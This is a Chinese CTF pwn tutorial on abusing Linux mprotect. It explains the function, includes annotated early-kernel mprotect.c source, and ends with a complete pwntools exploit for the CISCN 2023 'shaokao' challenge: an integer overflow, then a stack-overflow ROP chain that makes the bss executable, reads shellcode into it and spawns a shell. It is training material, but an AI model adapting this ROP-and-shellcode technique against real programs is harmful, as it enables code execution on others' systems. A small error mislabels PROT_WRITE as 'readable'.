mprotect函数利用详解
p
w
n
引入
在Linux中,mprotect函数的功能是用来设置一块内存的权限。
函数原型如下:
int mprotect(void * addr, size_t len, int prot)
其中变量addr代表对应内存块的指针,len代表内存块的大小,而prot代表内存块所拥有的权限
对于prot来说,对应权限依照以下规则改变值
无法访问 即PROT_NONE:不允许访问,值为 0
可读权限 即PROT_READ:可读,值加 1
可写权限 即PROT_WRITE:可读, 值加 2
可执行权限 即PROT_EXEC:可执行,值加 4
例如:我们要将某块内存区域权限设置为可读可写可执行,那么mprotect函数中prot参数便应该是1+2+4=7。
贴一下源码,方便大家理解:
```c
/*
* linux/mm/mprotect.c
*
* (C) Copyright 1994 Linus Torvalds
*/
// 修改虚拟地址address到address+size的页表项内容
static inline void change_pte_range(pmd_t * pmd, unsigned long address,
unsigned long size, pgprot_t newprot)
{
pte_t * pte;
unsigned long end;
if (pmd_none(*pmd))
return;
if (pmd_bad(*pmd)) {
printk("change_pte_range: bad pmd (%08lx)n", pmd_val(*pmd));
pmd_clear(pmd);
return;
}
// 获取一项页表项地址
pte = pte_offset(pmd, address);
// 屏蔽低位
address &= ~PMD_MASK;
// 结束地址
end = address + size;
// 不能超过该目录项管理的地址范围
if (end > PMD_SIZE)
end = PMD_SIZE;
do {
pte_t entry = *pte;
if (pte_present(entry))
// 更新页表项内容
*pte = pte_modify(entry, newprot);
// 下一个待处理的虚拟地址
address += PAGE_SIZE;
pte++;
} while (address < end);
}
// 修改虚拟地址address到address+size区间的页目录项、页表项内容
static inline void change_pmd_range(pgd_t * pgd, unsigned long address,
unsigned long size, pgprot_t newprot)
{
pmd_t * pmd;
unsigned long end;
if (pgd_none(*pgd))
return;
if (pgd_bad(*pgd)) {
printk("change_pmd_range: bad pgd (%08lx)n",
pgd_val(*pgd));
pgd_clear(pgd);
return;
}
// 某个页目录项
pmd = pmd_offset(pgd, address);
address &= ~PGDIR_MASK;
end = address + size;
if (end > PGDIR_SIZE)
end = PGDIR_SIZE;
do {
change_pte_range(pmd, address, end - address, newprot);
address = (address + PMD_SIZE) & PMD_MASK;
pmd++;
} while (address < end);
}
// 修改当前进程虚拟地址start到start+end区间的页目录和页表项内容
static void change_protection(unsigned long start, unsigned long end,
pgprot_t newprot)
{
pgd_t *dir;
// 返回某页目录项地址
dir = pgd_offset(current, start);
while (start < end) {
// 修改某页目录项对应的页表内容
change_pmd_range(dir, start, end - start, newprot);
start = (start + PGDIR_SIZE) & PGDIR_MASK;
dir++;
}
// 刷新快表
invalidate();
return;
}
// 设置vma的读写属性和映射方式
static inline int mprotect_fixup_all(struct vm_area_struct * vma,
int newflags, pgprot_t prot)
{
// 用户层面的属性
vma->vm_flags = newflags;
// 页的属性,和vm_flags存在映射关系
vma->vm_page_prot = prot;
return 0;
}
// 修改开始地址为vma->start,结束地址为end的内存属性
static inline int mprotect_fixup_start(struct vm_area_struct * vma,
unsigned long end,
int newflags, pgprot_t prot)
{
struct vm_area_struct * n;
// vma的flag和prot是是针对整个vma的,所以这里要切分成两个vma
n = (struct vm_area_struct *) kmalloc(sizeof(struct
vm_area_struct), GFP_KERNEL);
if (!n)
return -ENOMEM;
// 复制原vma结构体内容
*n = *vma;
// 修改原vma的start为end,即一分为二
vma->vm_start = end;
// 新vma的start不变,end改成切分边界的值
n->vm_end = end;
// 重新计算偏移,可能超过end
vma->vm_offset += vma->vm_start - n->vm_start;
// 只需要设置新块的标记
n->vm_flags = newflags;
n->vm_page_prot = prot;
// 多了一个vma引用文件
if (n->vm_inode)
n->vm_inode->i_count++;
if (n->vm_ops && n->vm_ops->open)
n->vm_ops->open(n);
// 插入进程的vma结构
insert_vm_struct(current, n);
return 0;
}
// 设置开始地址为start结束地址为vma的end这片内存的属性
static inline int mprotect_fixup_end(struct vm_area_struct * vma,
unsigned long start,
int newflags, pgprot_t prot)
{
struct vm_area_struct * n;
// 一分为二,申请一块新的vma
n = (struct vm_area_struct *) kmalloc(sizeof(struct
vm_area_struct), GFP_KERNEL);
if (!n)
return -ENOMEM;
*n = *vma;
// start为切分边界,修改原vma的end为start
vma->vm_end = start;
// 新vma的start为start
n->vm_start = start;
// 相当于vm_offset = vm_offset - vma->start + n->vm_start,新地址加上相对偏移
n->vm_offset += n->vm_start - vma->vm_start;
// 只需设置新块的属性
n->vm_flags = newflags;
n->vm_page_prot = prot;
// 多了一个vma引用文件
if (n->vm_inode)
n->vm_inode->i_count++;
if (n->vm_ops && n->vm_ops->open)
n->vm_ops->open(n);
// 插入进程vma结构
insert_vm_struct(current, n);
return 0;
}
// 设置开始地址为start结束地址为end这片内存的属性
static inline int mprotect_fixup_middle(struct vm_area_struct * vma,
unsigned long start, unsigned long end,
int newflags, pgprot_t prot)
{
struct vm_area_struct * left, * right;
// 一分为三
left = (struct vm_area_struct *) kmalloc(sizeof(struct
vm_area_struct), GFP_KERNEL);
if (!left)
return -ENOMEM;
right = (struct vm_area_struct *) kmalloc(sizeof(struct
vm_area_struct), GFP_KERNEL);
if (!right) {
kfree(left);
return -ENOMEM;
}
// 复制得到默认值
*left = *vma;
*right = *vma;
// 一块的结束地址是start
left->vm_end = start;
// 第二块的开始地址是start,结束地址是end,start和end是用户修改属性的内存范围
vma->vm_start = start;
vma->vm_end = end;
// 第三块的start是end
right->vm_start = end;
// 第一块不需要更新offset,第二、第三块需要更新offset,都是新开始地址+之前的相对偏移
vma->vm_offset += vma->vm_start - left->vm_start;
right->vm_offset += right->vm_start - left->vm_start;
// 只需要设置第二块的属性
vma->vm_flags = newflags;
vma->vm_page_prot = prot;
// 多了两个vma引用文件
if (vma->vm_inode)
vma->vm_inode->i_count += 2;
if (vma->vm_ops && vma->vm_ops->open) {
vma->vm_ops->open(left);
vma->vm_ops->open(right);
}
// 插入两个vma
insert_vm_struct(current, left);
insert_vm_struct(current, right);
return 0;
}
// 修改一个vma某个内存区间的属性
static int mprotect_fixup(struct vm_area_struct * vma,
unsigned long start, unsigned long end, unsigned int newflags)
{
pgprot_t newprot;
int error;
// 不变
if (newflags == vma->vm_flags)
return 0;
// 见mmap.c的protection_map,把用户层的标记转成页表项格式的值,第四位表示是否共享
newprot = protection_map[newflags & 0xf];
if (start == vma->vm_start)
if (end == vma->vm_end)
// 地址完全重合则直接覆盖vma的设置
error = mprotect_fixup_all(vma, newflags, newprot);
else
// start重合则修改start到end的设置
error = mprotect_fixup_start(vma, end, newflags, newprot);
// 结束地址重合
else if (end == vma->vm_end)
error = mprotect_fixup_end(vma, start, newflags, newprot);
else
// 中间部分重合
error = mprotect_fixup_middle(vma, start, end, newflags, newprot);
if (error)
return error;
// 修改页目录、页表的内容
change_protection(start, end, newprot);
return 0;
}
// 设置start开始,大小是len的这片内存的属性为prot
asmlinkage int sys_mprotect(unsigned long start, size_t len, unsigned long prot)
{
unsigned long nstart, end, tmp;
struct vm_area_struct * vma, * next;
int error;
// 低12位不为0,没有页对齐,报错
if (start & ~PAGE_MASK)
return -EINVAL;
// 长度是页大小的整数倍,~PAGE_MASK表示不够一页则补足一页
len = (len + ~PAGE_MASK) & PAGE_MASK;
// 修改的末地址
end = start + len;
if (end < start)
return -EINVAL;
// 只能设置这三个标记
if (prot & ~(PROT_READ | PROT_WRITE | PROT_EXEC))
return -EINVAL;
// 没有内存需要修改
if (end == start)
return 0;
// 找出地址start对应vma
vma = find_vma(current, start);
// 地址无效
if (!vma || vma->vm_start > start)
return -EFAULT;
// 循环处理
for (nstart = start ; ; ) {
unsigned int newflags;
/* Here we know that vma->vm_start <= nstart < vma->vm_end. */
/*
(vma->vm_flags & ~(PROT_READ | PROT_WRITE | PROT_EXEC))表示清掉读写执行三个标记,
保留其他的标记,然后再与prot。即重新设置读写执行位
*/
newflags = prot | (vma->vm_flags & ~(PROT_READ | PROT_WRITE | PROT_EXEC));
/*
flag的取值见mm.h
高四位是标记对应的属性是否可以设置。从低到高分别是可读、可写、可执行
newflags右移四位把高四位移到第四位,四位中,置一的位说明可以设置,所以不需要校验,
只需要校验为0的位,所以取反,置0的位变成1,如果最后与的时候非0,说明用户设置了这一位,
则不合法。(最后&0xf说明只关注低四位。)
*/
if ((newflags & ~(newflags >> 4)) & 0xf) {
error = -EACCES;
break;
}
// 成立的话说明用户设置的内存区间落在一个vma里,直接修改就行,否则需要修改多个vma,见下面
if (vma->vm_end >= end) {
error = mprotect_fixup(vma, nstart, end, newflags);
break;
}
// 用户设置的end大于vma的end,所以需要设置多次
tmp = vma->vm_end;
// 下一个vma
next = vma->vm_next;
// 设置第一个vma的属性,下一轮修改下一个vma的属性
error = mprotect_fixup(vma, nstart, tmp, newflags);
if (error)
break;
// 重新设置start的值,为当前vma的end,而不是下一个vma的开始地址
nstart = tmp;
vma = next;
// 下一块的start不等于nstart,即不等于上一块的end,说明不连续,用户设置的范围不合法,报错
if (!vma || vma->vm_start != nstart) {
error = -EFAULT;
break;
}
}
// 处理avl树
merge_segments(current, start, end);
return error;
}
```
函数效果:
下面我们用一个程序来演示mprotect函数的效果
```c
int main() {
void *heap = malloc(heap_SIZE); // 分配堆空间
if (heap == NULL) {
perror("无法分配堆空间");
return 1;
}
// 获取堆的页大小
long page_size = sysconf(_SC_PAGESIZE);
// 计算堆所在页的起始地址
void *heap_page = (void *)((unsigned long)heap & ~(page_size - 1));
// 修改堆的属性为可读、可写、可执行
if (mprotect(heap_page, heap_SIZE, PROT_READ | PROT_WRITE | PROT_EXEC) == -1) {
perror("无法修改堆属性");
free(heap);
return 1;
}
free(heap);
return 0;
}
```
编译后我们用pwndbg进行调试
将断点下载mprotect和free处,r键运行
当程序断在mprotect函数时用vmmap查看内存块权限
可以看到此时heap区域只有读写权限没有执行权限
再让程序执行到free处权限的堆块
可以看到此时我们就拥有了一块有rwx权限(即可读可写可执行)的堆块
此时这段rwx堆块就可以进行漏洞利用了。
利用姿势
利用mprotect与read等输入函数配合修改栈或bss段权限以执行shellcode
例题(ciscn2023 烧烤摊儿)
这道题的常规做法原本是ret2syscall构造rop链,但这道题中有mprotect函数,所以我们可以考虑利用其来修改权限来执行shellcode
ida
信息量有点大
pijiu函数中存在整数溢出
输入-1溢出使money大于10000买下烧烤摊进入gaiming函数,其中有一个栈溢出漏洞
那么我们就可以开始构造payload以修改权限执行shellcode
首先寻找一些需要用到的函数和寄存器
```python
read=0x457DC0#elf.symbols['read']
mprotect=0x458B00#elf.symbols['mprotect']
pop_rsi=0x40a67e
pop_rdx_rbx=0x4a404b
pop_rdi=0x40264f
'''
0x00000000004050ed : pop r12 ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x0000000000402648 : pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040a679 : pop r12 ; pop r13 ; pop r14 ; ret
0x000000000049bfb3 : pop r12 ; pop r13 ; pop rbp ; ret
0x0000000000413fbe : pop r12 ; pop r13 ; ret
0x0000000000402aad : pop r12 ; ret
0x00000000004050ef : pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x000000000040264a : pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040a67b : pop r13 ; pop r14 ; ret
0x000000000049bfb5 : pop r13 ; pop rbp ; ret
0x0000000000413fc0 : pop r13 ; ret
0x00000000004050f1 : pop r14 ; pop r15 ; pop rbp ; ret
0x000000000040264c : pop r14 ; pop r15 ; ret
0x000000000040a67d : pop r14 ; ret
0x00000000004050f3 : pop r15 ; pop rbp ; ret
0x000000000040264e : pop r15 ; ret
0x00000000004a404a : pop rax ; pop rdx ; pop rbx ; ret
0x0000000000458827 : pop rax ; ret
0x000000000042a664 : pop rax ; ret 1
0x0000000000402647 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040a678 : pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret
0x0000000000413fbd : pop rbp ; pop r12 ; pop r13 ; ret
0x0000000000402aac : pop rbp ; pop r12 ; ret
0x00000000004050f0 : pop rbp ; pop r14 ; pop r15 ; pop rbp ; ret
0x000000000040264b : pop rbp ; pop r14 ; pop r15 ; ret
0x000000000040a67c : pop rbp ; pop r14 ; ret
0x000000000049bfb6 : pop rbp ; pop rbp ; ret
0x0000000000478768 : pop rbp ; pop rbx ; ret
0x0000000000401b01 : pop rbp ; ret
0x000000000049bfb2 : pop rbx ; pop r12 ; pop r13 ; pop rbp ; ret
0x0000000000489870 : pop rbx ; pop r12 ; pop r13 ; ret
0x000000000040b536 : pop rbx ; pop r12 ; ret
0x000000000040a677 : pop rbx ; pop rbp ; pop r12 ; pop r13 ; pop r14 ; ret
0x0000000000413fbc : pop rbx ; pop rbp ; pop r12 ; pop r13 ; ret
0x0000000000402aab : pop rbx ; pop rbp ; pop r12 ; ret
0x0000000000404eba : pop rbx ; pop rbp ; ret
0x0000000000402080 : pop rbx ; ret
0x00000000004050f4 : pop rdi ; pop rbp ; ret
0x000000000040264f : pop rdi ; ret
0x00000000004a404b : pop rdx ; pop rbx ; ret
0x00000000004050f2 : pop rsi ; pop r15 ; pop rbp ; ret
0x000000000040264d : pop rsi ; pop r15 ; ret
0x000000000040a67e : pop rsi ; ret
0x00000000004050ee : pop rsp ; pop r13 ; pop r14 ; pop r15 ; pop rbp ; ret
0x0000000000402649 : pop rsp ; pop r13 ; pop r14 ; pop r15 ; ret
0x000000000040a67a : pop rsp ; pop r13 ; pop r14 ; ret
0x000000000049bfb4 : pop rsp ; pop r13 ; pop rbp ; ret
0x0000000000413fbf : pop rsp ; pop r13 ; ret
0x0000000000402aae : pop rsp ; ret
0x000000000040101a : ret
'''
```
然后先构造mprotect函数及其各个参数
然后先构造mprotect函数及其各个参数
```python
payload=b'a' * 0x20+p64(0)
payload+=p64(pop_rdi)+p64(0x4E8000)#第一个参数addr,0x4E8000是bss段上的一块空白区域
payload+=p64(pop_rsi)+p64(0x1000)#第二个参数len
payload+=p64(pop_rdx_rbx)+p64(7)+p64(0)+p64(mprotect)#第三个参数prot以及函数调用
```
既然已经修改了权限,那么就需要将数据读入对应地址,所以还要构造read函数
```python
payload+=p64(pop_rdi)+p64(0)#read的第一个参数,0代表从用户输入的值中读取
payload+=p64(pop_rsi)+p64(0x4E8000)#read的第二个参数,代表数据输入到的地址
payload+=p64(pop_rdx_rbx)+p64(0x100)+p64(0)+p64(read)#read的第三个参数输入大小和read函数调用
payload+=p64(0x4E8000)#read函数返回地址
```
发送这个payload后再构造一个shellcode并发送执行即可getshell
完整exp:
```python
from pwn import*
context(arch='amd64',log_level='debug')
#binary = './shaokao'
#elf=ELF('./shaokao')
s = lambda buf: io.send(buf)
sl = lambda buf: io.sendline(buf)
sa = lambda delim, buf: io.sendafter(delim, buf)
sal = lambda delim, buf: io.sendlineafter(delim, buf)
shell = lambda: io.interactive()
r = lambda n=None: io.recv(n)
ra = lambda t=tube.forever:io.recvall(t)
ru = lambda delim: io.recvuntil(delim)
rl = lambda: io.recvline()
rls = lambda n=2**20: io.recvlines(n)
su = lambda buf,addr:io.success(buf+"==>"+hex(addr))
#io=remote("node2.anna.nssctf.cn",28568)
io = process('./shaokao')
sl(str(1))
sl(str(1))
sl(str(-1000000))
ru("> ")
sl(str(4))
read=0x457DC0#elf.symbols['read']
mprotect=0x458B00#elf.symbols['mprotect']
pop_rsi=0x40a67e
pop_rdx_rbx=0x4a404b
pop_rdi=0x40264f
#gdb.attach(p)
ru("> ")
sl(str(5))
ru("请赐名:")
payload=b'a' * 0x20+p64(0)
payload+=p64(pop_rdi)+p64(0x4E8000)#第一个参数addr,0x4E8000是bss段上的一块空白区域
payload+=p64(pop_rsi)+p64(0x1000)#第二个参数len
payload+=p64(pop_rdx_rbx)+p64(7)+p64(0)+p64(mprotect)#第三个参数prot以及函数调用
payload+=p64(pop_rdi)+p64(0)#read的第一个参数,0代表从用户输入的值中读取
payload+=p64(pop_rsi)+p64(0x4E8000)#read的第二个参数,代表数据输入到的地址
payload+=p64(pop_rdx_rbx)+p64(0x100)+p64(0)+p64(read)#read的第三个参数输入大小和read函数调用
payload+=p64(0x4E8000)
#payload=b'a'*0x20+p64(0)+p64(pop_rdi)+p64(0x4E8000)+p64(pop_rsi)+p64(0x1000)+p64(pop_rdx_rbx)+p64(7)+p64(0)+p64(mprotect)+p64(pop_rdi)+p64(0)+p64(pop_rsi)+p64(0x4E8000)+p64(pop_rdx_rbx)+p64(0x100)+p64(0)+p64(read)+p64(0x4E8000)
sl(payload)
shellcode=asm(shellcraft.sh())
sl(shellcode)
shell()
```
效果图:
1
END
1
原文始发于微信公众号(火炬木攻防实验室):mprotect函数利用详解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论